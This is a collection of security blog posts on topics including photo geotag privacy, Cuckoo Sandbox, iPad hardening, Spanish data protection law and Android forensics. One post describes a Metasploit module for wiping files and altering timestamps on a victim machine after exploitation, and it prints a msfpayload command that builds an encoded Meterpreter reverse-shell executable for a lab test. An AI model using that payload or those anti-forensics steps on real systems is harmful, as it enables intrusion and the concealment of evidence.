The “hidden” information in your photos (they may be saying things you don’t know)

(Please note this post was originally published in the Spanish version of Security Art Work last 20th Jul 2011)

This post is not about steganography (see the definition we did in another post — Spanish), nor any complex technique developed by a technology expert. This is something much simpler: the geolocation information that some devices —including many smartphones— store on the photos without many users being aware of it. That information is saved in the “hidden” information of the photos and can be easily accessed with programs such as exif reader. Please note that with “hidden information” we do not mean information someone has tried to hide, but information that is unknown to most users of smartphones what in practice is basically the same as what we understand by “hidden”. Usually these devices have an option that allows us to enable or disable geolocation features; for instance, to do so on the Blackberry there is an option called GeoTag in the camera options.

As always the fact that a smartphone can geotag a photo is not a good or bad thing by itself. Our use of this information it’s what makes it a potential hazard so it’s important that everyone, especially the youngest ones, are aware of such information. It must be taken into account that the mixture between the geolocation of a photo and real-time information systems as it is the case of twitter can become an explosive mixture.

We can get an idea of this by visiting the url (project currently closed). It’s just scaring.

As we can see, extracting the geolocation data (longitude and latitude stored in the photo information) and using Google Maps we have not only the picture of our beautiful dog that we wanted to share with our friends but also the geolocation of our nice house:

What follows it is a fictional story… or maybe not.

Let’s suppose “bichomalo” (if you want to know who “bichomalo” —Badguy— is check this link: — Spanish) has just found Alice, a nice 15 years old girl who he is obsessed with.

Girl dads’ have bought her the latest smartphone with an Internet flat rate; they don’t know much about technology or security risks. Alice creates her twitter user —of course with her real name— and begins to tweet; it is cool. Soon, she starts sharing photos in their tweets, ignoring that they contain the coordinates of the place where the photo is taken. Bichomalo certainly knows it. He creates a fake profile and follows the girl; a photo of a young blonde girl trimmed down to show only her eyes, downloaded from any corner of the Internet, makes it credible enough. He often tweets girly things and even sends some private messages to Alice.

This friday our girl is at the birthday of her best friend. It took she some time to convince her parents but they finally accepted because she would not be far from home. The party is funny and she tweets many photos, but at 2am she gets tired and decides to go back home, only a few blocks away. “Time 2 go home“, publishes Alice in her twitter… Bichomalo reads it and knows exactly where is she, where is she going and her way to home; almost a hundred photos published over a couple of months with a lot of geolocation data. We don’t need to say anything else.

We can’t deny geolocation it is a useful technology. However, as with any other technology, we must be aware of its dangers and there’s only one way for it: education. Even more when, as we have seen, when its bad use may impact significantly on vulnerable groups as our children.

Securing your Android in open Wi-Fi networks

A couple months ago, our partner Jose Vila talked about the power of SSH tunnels. He showed how we can avoid firewalls and bypass those tricky filters using tunnelled traffic.

Today, I’m going to show you a different approach.

Nowadays, it is a dangerous thing to connect your smartphone unprotected to a free Wi-Fi. It is quite common that somebody is sniffing the traffic or you suffer an ARP poison attack. Then how can I be secure on a wifi network? Once again, with SSH tunnels. And how to build SSH tunnels with my Android? With SSH Tunnel.

[Read more…]

Customizing “Cuckoo Sandbox”

(Please note this post was originally published in the Spanish version of Security Art Work last 19th Nov 2012)

As many of our readers will already know Cuckoo Sandbox is an application for the automatic analysis of malware. The installation process in the current version of the sandbox is quite simple and has been described by other blogs in a very detailed manner. Once we have already installed sandbox, it will give us reports, such as the ones found in the malware analysis service hosted on Malwr, about the behavior of the malware, on the imported APIs, the results from virustotal, packer used, etc.

In this post I would like to emphasize the “real power”, from my humble point of view, of this sandbox, power that lies in the modular design that have made its developers and in the simplicity to develop modules for the automatic analysis of malware, making it a highly customizable Sandbox.

The design includes the following types of modules:

  • Machine Managers: modules to interact with the virtualization software, mainly vmware and virtualbox.
  • Analysis Packages: modules to deal with the different types of packages (packages: exe, bin, pdf, etc.).
  • Process Modules: modules that define the actions that are launched on the results (pcap, etc.) collected during the phase of analysis and execution of the malware.
  • Signature Modules: modules to define signatures to be applied on the final results (“Process Modules“) of the previous phases.
  • Reporting Modules: modules to display results.

As we can see, the range of actions is very broad; we can add support for a new hypervisor (for example, we could add support to simulate Android) or to define how we want the information be displayed in our control panel with the design of a reporting module.

As I see it, the application design allows fast and easy writing of modules (at least signatures that has been what I have tried). Below I show two examples created quickly that have been added to the project (you can download all the signatures of the community with the “utils/” utility):

  • CreateRemoteThread: detects code injections with CreateRemoteThread.
  • BOT Ruskill Mutex: detects a mutex of the bot Ruskill by what we have seen in different samples executed in the Sandbox.

As you can see the power of customization it is very high and if Cuckoo roots in the community, will be a very serious alternative for automatic analysis of malware.


(Please note this post was originally published in the Spanish version of Security Art Work last 20th Nov 2012)

A couple of weeks ago I saw ARGO, a film directed by and starring Ben Affleck. I have to admit that I didn’t put much hope in it (Daredevil did much evil to Ben Affleck… well, that one and many others), but it turned out to be more than good (it gets a 7.4 in filmaffinity).

Without getting into spoilers, ARGO it is based on a true story that takes place in Iran in 1979 in the middle of social riots. In order to say as little as possible, there is an attack on the United States Embassy, which decides to destroy all the existing information (indeed they first talk about burning the documentation but they finally use shredders). The Embassy is assaulted but a group of people from the Embassy flees and takes refuge “somewhere” in Iran. Since they haven’t burnt all the documentation, the attackers retrieve the documents shredded trying to recover information that allows them to identify the fugitives. And that’s all I can say.

What I mean is that sometimes we don’t give the paper documentation the necessary importance; we could say it is indeed often undervalued; not everything are passwords and encryption. In the same way, when we shred documentation, we often think that any shredder is good for this task.

[Read more…]

The iPads of the Spanish members of parliament

A few weeks ago we saw in the Spanish media a story that couldn’t go unnoticed [1] [2] [3] [4] (Spanish press). The news said that 20 Spanish members of parliament had lost the iPad that at the beginning of the current term of office —less than a year ago— they had received for their work. Leaving aside the controversy about the need of this tool and the responsibility that these members should have with a corporate device, let’s get into what concerns to us: security.

As anybody knows, an iPad can be used to store documents, emails, phone numbers, schedules, etc., tipically information that can be considered sensitive for an organization and in this case for the Spanish State. I would like to think that these devices had different security measures in place, such as control access with password, encryption, blocking and even deletion of the stored information after several failed access attempts, etc. All that, in addition to the appropriate measures to remotely lock and erasing its contents remotely.

However, that’s what I would like to think, because some media information points recently that these devices did not even had activated the tool “Find my iPad“, which can be installed on devices with iOS and makes it possible to lock, erase and locate the device remotely. Ok, devices are lost and we can’t get them back. So, what information did contain these devices? Did they contain confidential information?

As any other organization the Chamber of Deputies should have a policy of acceptable use of the devices that each member of parliament should sign after receiving the corporate devices. Furthermore the service, area or department competent to technological matters should take the appropriate measures to avoid that in the event of a loss anyone could access the information stored in the device, even when such controls conflict with the reluctance of the members (we all know “the user”). Looks like we will never know which information contained those devices, not even the security measures applied, but I would like to think that the information wasn’t important or confidential and that the recommendations S2 Grupo did some time ago (you can check the original information in Spanish at S2 Grupo webpage) had been implemented:

(As the original recommendations are based in the Spanish version of iOS, some paths may differ from the English version)1. Typing the PIN
This security measure is the only one that isn’t technical; when typing the access PIN we must avoid that this key can be envisioned by a third party. In order to avoid shoulder-surfing attacks and PIN disclosure, we must proceed as we do when we get money from an ATM. The PIN is the key to our device, we have to protect it.

2. Upgrade the operating system
It is necessary to apply any available system update from the manufacturer.
How: in Settings/General/software update you should get the message “the software is up-to-date“.

3. Access control
It is necessary to use a PIN to access the device.
How: in Settings/General/lock with code must select the access code to the device.

4. Self-locking
The device must lock automatically after five minutes of inactivity.
How: in Settings/General/auto lock parameter value must be ‘5 minutes’.

5. Grace period for lock
The device must not have grace period for access without a key.
How: in Settings/General/lock with code “prompt” must have the value “Immediately“.

6. Photo frame
The use of the device as a photo frame without the need of password should not be allowed.
How: in Settings/General/lock with code option “Photo frame” must be “Disabled“.

7. Deletion after failed access attempts
The device should be automatically wiped after 10 failed access attempts (please be careful with this specially if children or any other “authorized” people can try to access your device).
How: in Settings/General/lock with code the option “Erase data” must be “Enabled“.

8. Data protection
If you set an access code, the device encrypts all the information with a key derived from the access code.
How: in Settings/General/lock with code should display the message “data protection is enabled” at the bottom of the window.

9 Bluetooth
We must activate Bluetooth only when we needed and disable it otherwise.
How: in Settings/General/Bluetooth must fix the ‘NO’ option.

10. Navigation
Fraud notification must be enabled so when accessing potentially harmful pages, the device locks them automatically.
How: the option Settings -> Safari -> notice of fraud must be “Activated”.

This is all for now. Have a nice weekend!

II Security Conference “Navaja Negra”

Next November 30th and December 1st, the second Conference on Information Security “Navaja Negra” will take place in Albacete, with a series of speeches focusing on Information Security such as:

  • All your appliances are belong to us. Presentación de un 0-day.
  • Show me your Intents.
  • HASH COLLISIONS: Welcome to the (un)real World!
  • Take a walk on the wild side.
  • A brief introduction to reversing code with OllyDbg and other tools.
  • From mail to jail: Exploit your ex.girlfriend.
  • (in)Security in Mobile Communications.
  • IPv6 vs IDS, se aceptan apuestas…

Talks will be given at Friday evening and Saturday morning in the Assembly Hall of the CEEI (Centro Europeo de Empresas de Innovación) by recognized professionals on security.

Conferences are completely free of charge but you need to register (there are no remaining free spaces although conferences will be broadcasted in streaming).

Information about the lectures is available in the section Itinerario del Congreso. If you come from outside Albacete, you might want to check Renfe and the Beatriz Hotel discounts. You also have the official poster to download.

All information is available in For questions and inquiries you can email us at contacto<at>navajanegra<dot>com.

External figures of Spanish Data Protection Act (LOPD)

(Editor note: This post is relative to the Spanish Data Protection Act or LOPD. Although LOPD is based on the 95/46/CE directive it may not be fully applicable to other countries inside the EU, so several sentences have been modified or eliminated.)

It’s been a long time since our last post about the Spanish Data Protection Act or LOPD. As you know, the Spanish Data Protection Act distinguishes between a series of figures, which can be grouped into “internal” and “external”. The first group includes mainly the Responsable de Seguridad (Security Manager) and the Responsable del Tratamiento (or Controller in 95/46/CE). Note that although some functions may be delegated to external companies, it is not possible to delegate responsibility, hence we consider these figures to “internal”.

In the second group, the subject of this post, we find the Encargado del Tratamiento (Processor in 95/46/CE), the Cesionario (approx. Recipient in 95/46/CE) and the service provider without access to personal data. Each of these figures has also specific features besides its own ambiguities. Ok.

  • Encargado del Tratamiento or Processor: The LOPD defines the figure in Section 3, g) as “the natural or legal person, public authority, agency or any other body who, alone or jointly with others, processes personal data on behalf of the Responsable del Tratamiento [or Controller]“.To be absolutely clear we must see the definition of “data processing” in paragraph c) of the same article: “technical operations and procedures automated or not, enabling the collection, recording, storage , development, modification, blocking and cancellation, as well as transfers of data resulting from communications, consultations, interconnections and transfers “.

    Let´s see some examples. Suppose Company A hires the agency B to do the staff payroll. It is clear that in the process, B will process the data of company A employees “on behalf” of the company A. Therefore, the agency is a processor.

    Now the same company hires the company C for the management of their customer support center, which admits internal and external users inquiries. The events reported by the users contain the name of the user and other contact information. Again, it seems clear that C is a processor as they process personal data of “on behalf” of A..

    In these cases, it is necessary that company A signs, apart from the corresponding contract services, a personal data access contract as specified in Article 12.2 of the LOPD: “Performing treatments for others should be regulated in a contract […] where expressly establishes that the processor will only process the data in accordance with the instructions of the controller, and the data will not be applied or used for purposes other than that contained in the contract, nor shall, not even for preservation, to others. In the contract there will be stipulated […] the security measures […] that the processor is required to implement.

    Note that since the Responsable del Tramiento or Controller (ie, who ultimately must ensure the security of the data) is the company, neither the agency nor the CAU management company must declare the processing, as it corresponds to “A”.

    Let’s move on to the next.

  • Service Provider without access to personal data: Although LOPD does not explicitly define this figure (remember that between the LOPD and its regulation RDLOPD there are more than eight years), it is mentioned in the Article 83 of RDLOPD named “Services rendered without access to personal data“. In this case we will find companies which provide services unrelated to personal data but may have sporadic access to such information.Let’s see a couple of cases. This company has hired E, a cleaning company, whose contract is not obviously related to the processing of personal data. However, it is possible that in the performance of their duties, employees of E can see personal data.

    Company A has also hired a security company, let’s call such F, who has put a security guard monitoring the company fence perimeter. Again, in his work Philip (that’s the name of the guard) does not manage personal data, but can see people entering and leaving the company.

    Now if Philip is given new attributions and becomes responsible of the registration of the staff and visitors that enter and exit the company, the security company becomes a processor, that manages personal data “on behalf” of the company A.

    In these cases, the services contract “expressly collect the prohibition of access to personal data and the obligation of secrecy regarding the data that the staff could have known because of the service” (Art. 83 RDLOPD) , although it is usual that such information is contained in a separate confidentiality agreement contract.

    Again, also in this case it is A who must declare the processing, not the security company nor the cleaning one.

  • Cesionario or Recipient: Finally, we have the recipient (95/46/CE definition of “recipient” may not be exactly the same as the LOPD). The LOPD defines in Article 3.i) the transfer or communication of data as “any disclosure of data to a person other than the person concerned“. However, when this data communication relates to the provision of services is not considered a communication of data, as specified in Article 12.1 of the LOPD: “ shall not be deemed data communication from a third party access to data when such access is necessary for the provision of a service to the controller “. Article 20.1 of RDLOPD adds an important consideration: “However, communication is deemed to exist when the access data is aimed at establishing a new connection between the entity accessing data and the user” .Note that this figure is the one most related to breaches of the LOPD, as often the necessary collaterals for the communication of the data to a third party (generally consent of the user affected) are not met. Put it this way, a recipient is “someone” who wants to establish its “own” processing over the personal data received, and will not always get the legal and necessary consent from the user. Unlike previous cases, since there is a new data processing and a new link between the user and the company receiving the data, it is necessary that the recipient declares the processing.

    Let’s see a couple of examples of what is a data communication.

    Imagine that Company A provides (sells, trades, sends) data of its employees to a telemarketing company for it’s use for their campaigns. In this case we are talking about a legal data communication if the consent of the employees has been previously requested (and thus company A has provided only the data of those who have given such consent), and illegal if it was not so. Note that this case is different from the case in which agency B decides to use on its own to use the data of the employees of Company A to send them comercial information, as stated in Article 12.4: “In the event that the processor uses the data for other purposes […] in breach of the contract shall be treated also as a controller […]“.

    It is also different from the case in which Company A hires telemarketing firm H for a commercial campaign, since in this case H would be a processor and who would incur an illegality would be the company A (unless he gets the consent of the final user). It is common to see this case to try to elude LOPD: a Spanish company hires an Indian company to send commercial information to its customers because LOPD doesn’t apply to the indian company itself. However, LOPD applies as the data processing is done “in the context of the activities of an establishment of the controller” (Article 3.1.a RDLOPD).

    Let’s finish with another case. Company A decides to hire a health insurance for their employees with the company J. Since such data processing is not directly related to any services contract between A and J, it is a data communication for which A must request consent of their employees. Moreover, in this case it is clear that a new independent link is created between the employee and the insurance company in which the company A does not intervene, and that can be maintained even when the employment relationship between the employee and the company A is complete.

Obviously, there are many other aspects of these figures noteworthy to mention, but first of all, it is imperative that an organization knows what is a processor, what a recipient and what a service provider without access to personal data, since each one of these figures require a different treatment. Please ask in the comments any doubts you may have.

Safe Delete Meterpreter Module

It has recently been added to Metasploit (master branch) a module that can be interesting to delete files downloaded in a victim computer thru a meterpreter session.

This module, sdel, overwrites the file we want the number of times we choose, with random characters or null bytes (like the shred Linux command). Moreover, before deleting the file, it overwrites its name with a long string (200 bytes) and modifies its MACE attributes (access date, modification, creation and entry in the Master File Table (MFT)) making use of the API priv.fs.set_file_mace, as it is shown in its code.

As shown in the image, the new generated dates will correspond to the current date minus N random days .

Code of the change_mace function
It is worth to mention that in NTFS systems if the user wants to delete very small files, they could remain in the MFT stream descriptor and thus they would not be overwritten. The module sdel would alert the user, warning that the file to be deleted is less than 800 bytes. Sdel, therefore, overwrites the file content and the slack space (—lost— space left between the end of the file and the cluster used), but it won’t do a wipe of the free space. It is important to take this into account because files that use the encryption/compression of Windows, as well as temporal files, may remain scattered around the disk without being overwritten.

As its description shows, this module can be very useful when, for instance, in the phase of post exploitation of a victim computer the user needs to download an executable file to perform some action and after that to delete its contents safely, in order to make it difficult for a potential subsequent forensic analysis.

The use of sdel is simple. To overwrite and delete the desired file, the user only has to specify the number of overwriting iterations that must be performed and the type of overwriting (random or null bytes). These are the choices of the module:

Module options
Now suppose the following scenario. We have a meterpreter session [1] on a victim machine in which we used the tool mimikatz (tool to dump plaintext passwords from a Windows or obtaining hashes from SAM, among other features) and we want to delete after using it. We execute sdel setting three passes of file overwriting:

If after deleting a file with sdel we check its contents [2] on disk before and after the deletion, we can see that it has been overwritten properly. The following screenshots show the result before and after deleting a test file (msf.txt) on an NTFS filesystem.

File content on disk BEFORE being deleted by sdel

File content on disk AFTER being deleted by sdel

MFT content BEFORE deleting the file by sdel

MFT content AFTER deleting the file by sdel
As seen in previous images both the name and the contents MTF have been overwritten.

The module has been developed by Borja Merino (@borjamerino), regular author of this blog, and you can use it as far as you are using the last version of Metasploit.

[1] The tests have been performed with a VM with Windows 7 (X.X.X.51) and Backtrack 5 r3 (X.X.X.41) used to generate a executable file (meterpreter.exe) with payload windows/meterpreter/reverse_tcp coded with the algorithm shikata_ga_nai:

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.41 R | ./msfencode -e x86/shikata_ga_nai 
-c 10 -t exe -o meterpreter.exe

Executing the meterpreter.exe file in the victim machine and using Metasploit we obtain our reverse shell to connect to the victim computer:

Meterpreter session obtained
[2] The tool used has been WinHex.

Android Log Forensics

The introduction of the Android operating system in mobile devices is growing at a overwhelming speed. Latest data point shows that 1.3 million Android devices are activated every day (Spanish). If Android maintains this pace, in just 4 years there will be more Google systems in operation than Windows systems. Therefore, the study of the security of Android is necessary and in security, an interesting and important area is the forensic study.

A forensic analyst must be able to extract the maximum available information from the device. Depending on the purpose of the research, s/he will focus on extracting different types of data. For example, a researcher who analyzes a possible malware-infected smartphone need processes in memory, active connections, the inbound and outbound traffic, while in the analysis of a mobile phone whose owner is suspected of a crime, it will look for data that could help the investigation to provide evidence, such as calls, emails, GPS position, photos, chat history, etc.

There area several methods to extract information from an android device: RAM memory dump, NAND memory image, external memory SD-card data and hot extraction data. Today’s post focuses on recovering data by using the Android system’s own commands, and more specifically, the logs generated by the system.

[Read more…]

TCPdump DROP privileges

I’m sure many of you know tcpdump and use it frequently. As we all know when it is run without privileges to capture packets on a network interface it displays the following message:

$ /usr/sbin/tcpdump -i eth0
tcpdump: eth0: You don't have permission to capture on that device
(socket: Operation not permitted)

[Read more…]